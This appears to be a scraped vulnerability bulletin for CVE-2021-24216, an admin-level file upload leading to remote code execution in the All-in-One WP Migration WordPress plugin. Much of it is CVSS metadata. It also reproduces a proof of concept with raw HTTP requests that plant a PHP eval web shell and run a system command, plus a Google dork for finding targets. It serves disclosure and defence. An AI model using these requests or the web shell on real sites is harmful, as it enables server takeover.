All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE

2022-02-07T00:00:00

Description

The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.

{"id": "WPEX-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE", "description": "The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.\n", "published": "2022-02-07T00:00:00", "modified": "2022-04-13T07:36:24", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "", "reporter": "YICHENG LIU_chenfeng lab", "references": ["https://plugins.trac.wordpress.org/changeset/2516181#file8"], "cvelist": ["CVE-2021-24216"], "immutableFields": [], "lastseen": "2022-04-15T14:14:51", "viewCount": 23, "enchantments": {"exploitation": null, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24216"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083"]}]}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24216"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "vulnersScore": 5.7}, "_state": {"dependencies": 0}, "_internal": {}, "sourceData": "To reproduce:\r\n- Log in, Click all in one WP migration import to use the import from file function.\r\n- Intercept wp-admin/admin- ajax.php?action=ai1wm_ import&ai1wm_ Import = 1 request.\r\n- Change the parameters of \u201cupload-file\u201d, \u201cstorage\u201d and \u201carchive\u201d. Insert malicious PHP code into \u201cupload-file\u201d. Submit the request.\r\n- Access the URL under to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]\r\n\r\n# Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution\r\n# Google Dork: inurl:/wp-admin/admin-ajax.php\r\n# Date: 23/12/2020\r\n# Exploit Author: YICHENGLIU_chenfeng lab\r\n# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/\r\n# Version: All-in-One WP Migration <=7.38\r\n# Tested on: windows 10(x64)\r\n# data in http request :\r\n\r\n\r\nPOST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1\r\nHost: 192.168.9.240\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: */*\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797\r\nContent-Length: 740\r\nOrigin: http://192.168.9.240\r\nConnection: close\r\nCookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799\r\n\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"shell.wpress\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php eval($_POST['c']);\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"priority\"\r\n\r\n5\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"secret_key\"\r\n\r\n7wD1bP6YC4xB\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"storage\"\r\n\r\nshell\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"archive\"\r\n\r\nshell.php\r\n-----------------------------3937767834299093780715813797--\r\n\r\n##########################\r\nexecute shell\r\n##########################\r\nPOST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1\r\nHost: 192.168.9.240\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 19\r\n\r\nc=system('whoami');\r\n\r\n###########################\r\nExecute response\r\n###########################\r\nHTTP/1.1 200 OK\r\nDate: Fri, 19 Mar 2021 09:00:56 GMT\r\nServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9\r\nX-Powered-By: PHP/5.6.27\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 1124\r\n\r\ndesktop-psag0ka\\gongfang-9", "generation": 0}

{"cve": [{"lastseen": "2022-03-23T14:49:31", "description": "The All-in-One WP Migration WordPress plugin before 7.41 does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-07T09:15:00", "type": "cve", "title": "CVE-2021-24216", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24216"], "modified": "2022-03-11T17:43:00", "cpe": [], "id": "CVE-2021-24216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24216", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2022-04-15T14:14:51", "description": "The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.\n\n### PoC\n\nTo reproduce: \\- Log in, Click all in one WP migration import to use the import from file function. \\- Intercept wp-admin/admin- ajax.php?action=ai1wm_ import&ai1wm;_ Import = 1 request. \\- Change the parameters of \u201cupload-file\u201d, \u201cstorage\u201d and \u201carchive\u201d. Insert malicious PHP code into \u201cupload-file\u201d. Submit the request. \\- Access the URL under to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive] # Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution # Google Dork: inurl:/wp-admin/admin-ajax.php # Date: 23/12/2020 # Exploit Author: YICHENGLIU_chenfeng lab # Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/ # Version: All-in-One WP Migration <=7.38 # Tested on: windows 10(x64) # data in http request : POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm;_import=1 HTTP/1.1 Host: 192.168.9.240 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797 Content-Length: 740 Origin: http://192.168.9.240 Connection: close Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799 \\-----------------------------3937767834299093780715813797 Content-Disposition: form-data; name=\"upload-file\"; filename=\"shell.wpress\" Content-Type: application/octet-stream \n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T00:00:00", "type": "wpvulndb", "title": "All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24216"], "modified": "2022-04-13T07:36:24", "id": "WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083", "href": "https://wpscan.com/vulnerability/87c6052c-2628-4987-a9a3-a03b5ca1e083", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

All-in-One WP Migration &lt; 7.41 - Admin+ Arbitrary File Upload to RCE

Description

Related

All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE